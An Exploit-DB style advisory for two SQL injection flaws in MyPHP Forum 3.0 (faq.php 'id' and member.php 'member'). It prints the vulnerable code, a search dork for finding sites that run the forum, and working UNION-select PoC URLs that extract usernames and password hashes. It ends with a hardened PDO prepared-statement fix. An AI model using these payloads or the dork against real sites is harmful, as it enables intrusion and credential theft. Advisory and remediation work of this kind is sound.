Vendor: MyPHP Forum
By: x0kster
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: MyPHP Forum
Affected Version From: <= 3.0 (Final)
Affected Version To: <= 3.0 (Final)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability

MyPHP Forum version 3.0 (Final) is affected by two remote SQL injection vulnerabilities. The first is in faq.php, where the 'id' parameter is placed into an SQL query without any validation or escaping. The second is in member.php, where the 'member' parameter is likewise used unsanitized in an SQL query. In both cases an attacker can use the parameter to execute arbitrary SQL against the forum database.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user inputs before using them in SQL queries. Additionally, enabling magic_quotes_gpc on the server can provide some level of protection against SQL injection attacks.

Exploit-DB raw data:

Name            :  MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author          :  x0kster
Email           :  x0kster@gmail.com
Site            :  ihteam.net
Script Download :  http://www.myphp.ws/
Date            :  31/12/2007
Dork            :  "Powered by: MyPHP Forum"

Note:
For this to work, magic_quotes_gpc must be turned off on the server.
Usually the table prefix is 'nb'.



SQL injection in faq.php

   <?php
   //faq.php
   [...]
   $id = $_GET['id'];
   if($action == "view" && !empty($id)) {
       $result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- no check on $id at all :-D
       $row = mysql_fetch_array($result);
       $row[answer] = postify($row[answer]);
   [...]
   ?>

So we can execute an SQL injection through the bugged variable $id.

PoC:

http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*




SQL injection in member.php

   <?php
   //member.php
   [...]
   if($action == "viewpro") {
       $member = $HTTP_GET_VARS['member'];
       $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
   [...]
   ?>

The $member variable isn't checked either, so we can exploit it.

PoC:

http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*
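The two snippets above share one root cause: a request parameter is concatenated into the SQL string, so the quote and comment characters in it become part of the statement. The mitigation section's magic_quotes_gpc suggestion only escapes quotes and was removed from PHP entirely in 5.4, so it is not a fix. Below is an added example, written for this page and not MyPHP Forum's own code, showing how both handlers look when the values are bound as parameters with PDO prepared statements. The connection details, the nb_faq / nb_member table names and the uid/username columns are assumptions taken from the advisory's snippets and PoCs; everything else is placeholder.

```php
<?php
// Added example, not part of MyPHP Forum: hardened versions of the faq.php
// and member.php handlers from the advisory. User input is bound as a
// parameter, never concatenated into the SQL text.

$dsn = 'mysql:host=localhost;dbname=forum;charset=utf8mb4'; // placeholder DSN
$pdo = new PDO($dsn, 'dbuser', 'dbpass', [                  // placeholder creds
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
]);

// Table names are configuration, not request data (assumed prefix 'nb', as the advisory notes).
$db_faq    = 'nb_faq';
$db_member = 'nb_member';

// faq.php, action=view: 'id' must be a positive integer, so validate it as one
// before it gets anywhere near the query. An input such as "-1' union select ..."
// fails validation here instead of being silently cast or interpolated.
function viewFaq(PDO $pdo, string $table, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // Identifiers cannot be bound, so $table must come from config (it does), not from the user.
    $stmt = $pdo->prepare("SELECT id, answer FROM `$table` WHERE id = :id");
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// member.php, action=viewpro: 'member' is free text, so bind it as a string.
// The driver sends the value separately from the statement text, so quotes,
// UNION keywords and comment sequences inside it have no syntactic effect.
function viewProfile(PDO $pdo, string $table, $rawName): ?array
{
    if (!is_string($rawName) || $rawName === '' || strlen($rawName) > 64) {
        http_response_code(400);
        return null;
    }
    // Select only what the profile page needs; the original "SELECT *" also pulled the
    // password column, which is what the PoC extracted. Column names are assumed.
    $stmt = $pdo->prepare("SELECT uid, username FROM `$table` WHERE username = :name");
    $stmt->execute([':name' => $rawName]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Dispatch, mirroring the original $action handling.
$action = $_GET['action'] ?? '';
if ($action === 'view') {
    $row = viewFaq($pdo, $db_faq, $_GET['id'] ?? '');
    // ... render $row['answer'] through htmlspecialchars() before output ...
} elseif ($action === 'viewpro') {
    $row = viewProfile($pdo, $db_member, $_GET['member'] ?? '');
    // ... render the profile ...
}
```

Two design points: the integer parameter is validated rather than merely escaped, because an id that is not an integer is simply an invalid request; and the profile query names its columns, so even a future injection or logic bug in that handler cannot return password hashes the way the original "SELECT *" did. Escaping-based fixes such as magic_quotes_gpc or addslashes() do not address numeric contexts (the faq.php query would still be injectable if the id were not quoted) and are not a substitute for parameter binding.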

# milw0rm.com [2007-12-31]